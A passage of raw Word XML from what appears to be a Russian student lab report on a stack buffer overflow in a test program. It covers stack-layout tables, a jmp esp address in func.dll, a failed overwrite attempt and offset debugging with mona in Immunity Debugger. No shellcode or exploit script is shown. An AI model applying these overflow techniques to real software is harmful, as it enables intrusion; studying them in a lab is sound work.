            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int a3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58762854" w14:textId="70C58966" w:rsidR="003205B6" w:rsidRDefault="00532CF3" w:rsidP="00532CF3">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Таблица \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00532CF3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Состояние стека при вызове функции до экспулатации уязвимости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60"/>
        <w:gridCol w:w="7194"/>
      </w:tblGrid>
      <w:tr w:rsidR="00532CF3" w14:paraId="5EAADF9F" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="247A40C4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ESP (EBP-0x9E8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01135B86" w14:textId="77777777" w:rsidR="00532CF3" w:rsidRDefault="00532CF3" w:rsidP="00A7159A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="53F9E282" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C51BC97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EBP-0x9CC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BCCC64" w14:textId="0CFB462C" w:rsidR="00532CF3" w:rsidRP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‘A’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="2B641410" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34736853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EBP-0x9C8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A75FC7D" w14:textId="76EB1B44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‘AAAA’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="0C64BE2B" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39627CAF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7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12561B5F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532CF3" w14:paraId="6B9A2C4F" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE02302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EBP-0x001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24ABBDB9" w14:textId="1E64421E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‘AAAA’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w:rsidRPr="00532CF3" w14:paraId="4863FD41" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14A2C531" w14:textId="77777777" w:rsidR="00532CF3" w:rsidRPr="00D40160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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4373B142" w14:textId="10089C47" w:rsidR="00532CF3" w:rsidRP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‘AAAA’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w:rsidRPr="00B27B02" w14:paraId="49E304FB" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF77D02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EBP+0x004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378379C3" w14:textId="34C154CF" w:rsidR="00532CF3" w:rsidRDefault="00532CF3" w:rsidP="00A7159A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>адрес</w:t>
            </w:r>
            <w:r w:rsidRPr="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>jmp</w:t>
            </w:r>
            <w:r w:rsidRPr="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:r w:rsidRPr="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">’ </w:t>
            </w:r>
            <w:r>
              <w:t>в</w:t>
            </w:r>
            <w:r w:rsidRPr="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:r w:rsidRPr="00532CF3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="2B4B0AB3" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2542F48A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EBP+0x008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14AC266E" w14:textId="7F7C260E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Shellcode[0…3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="2FB722D4" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E64C77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EBP+0x00C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36107076" w14:textId="5CDBD28D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Shellcode[4…7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00532CF3" w14:paraId="5F3243ED" w14:textId="77777777" w:rsidTr="00A7159A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FBFEF31" w14:textId="77777777" w:rsidR="00532CF3" w:rsidRDefault="00532CF3" w:rsidP="00A7159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EBP+0x010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2147EBEA" w14:textId="6B664E0C" w:rsidR="00532CF3" w:rsidRDefault="00532CF3" w:rsidP="00407203">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Shellcode[8…11]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A4AAAB0" w14:textId="52C099E7" w:rsidR="00532CF3" w:rsidRPr="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Таблица \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фрейм функции в стеке после переполнения (до </w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006F8523" w14:textId="5B0481C9" w:rsidR="00267A3C" w:rsidRPr="00127358" w:rsidRDefault="00267A3C" w:rsidP="0054546C">
      <w:r>
        <w:t xml:space="preserve">Для поиска инструкций </w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve">jmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esr</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">был написан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:r w:rsidRPr="00267A3C">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>скрипт с кодом которого можно ознакомиться в Приложении 2.</w:t>
      </w:r>
      <w:r w:rsidR="00127358" w:rsidRPr="00127358">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:t xml:space="preserve">В результате в исполняемом сегменте кода </w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidR="00127358" w:rsidRPr="00127358">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00127358" w:rsidRPr="00127358">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:t xml:space="preserve">были найдены с инструкции </w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="00127358" w:rsidRPr="00127358">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidR="00127358" w:rsidRPr="00127358">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00127358">
        <w:t>м. рисунок 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9FC91" w14:textId="77777777" w:rsidR="00267A3C" w:rsidRDefault="00267A3C" w:rsidP="00267A3C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00267A3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51902040" wp14:editId="696E3C9C">
            <wp:extent cx="3076575" cy="3076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0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3077004" cy="307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A30E2" w14:textId="4E02BC6B" w:rsidR="00267A3C" w:rsidRPr="009872D5" w:rsidRDefault="00267A3C" w:rsidP="00267A3C">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0012735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127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Найденные скриптом инструкции </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707419AA" w14:textId="3D263B8B" w:rsidR="00127358" w:rsidRDefault="00127358" w:rsidP="00127358">
      <w:r>
        <w:t xml:space="preserve">Для эксплуатации </w:t>
      </w:r>
      <w:r w:rsidR="00532CF3">
        <w:t xml:space="preserve">планировалось </w:t>
      </w:r>
      <w:r>
        <w:t>использовать первый из найденных адресов – 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:t>62501297.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945C668" w14:textId="3D79B86E" w:rsidR="00127358" w:rsidRDefault="00127358" w:rsidP="00127358">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Эксплуатация уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990E875" w14:textId="77777777" w:rsidR="00A7159A" w:rsidRPr="00A7159A" w:rsidRDefault="00532CF3" w:rsidP="00532CF3">
      <w:r>
        <w:t>Однако поэксплуатировать уязвимость подобным образом не получилось.</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve"> При запуске программы с измененными 18-19 байтами в </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ImmunityDebugger</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">никогда не удавалось дойти до </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">функции </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">, так как в </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">случалось исключение </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Violation</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t>, вероятно из-за попытки записать в адреса за пределами страницы памяти.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> С помощью </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">команды </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pattern</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ImmunityDebugger</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">был создан уникальный паттерн, добавлен в конфиг в качестве буфера с помощью </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t xml:space="preserve">скрипта, приведенного в Приложении 3. При запуске выяснилось, что </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t>на момент исключения находится по смещению 3332 от начала буфера, а не на 2512, как ожидалось.</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t>Затем была запущен !</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>findmsp</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A">
        <w:t>, для просмотра состояния стека. В выходном файле видно следующее</w:t>
      </w:r>
      <w:r w:rsidR="00A7159A" w:rsidRPr="00A7159A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708275B7" w14:textId="73D0E151" w:rsidR="00A7159A" w:rsidRDefault="00A7159A" w:rsidP="00A7159A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEB92A4" wp14:editId="0C71E5B8">
            <wp:extent cx="5198534" cy="1211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650"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5198534" cy="1211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528EF" w14:textId="6A79318A" w:rsidR="00532CF3" w:rsidRPr="001E6E17" w:rsidRDefault="00A7159A" w:rsidP="00A7159A">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A7159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A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00447612">
        <w:rPr>
          <w:b w:val="0"/>
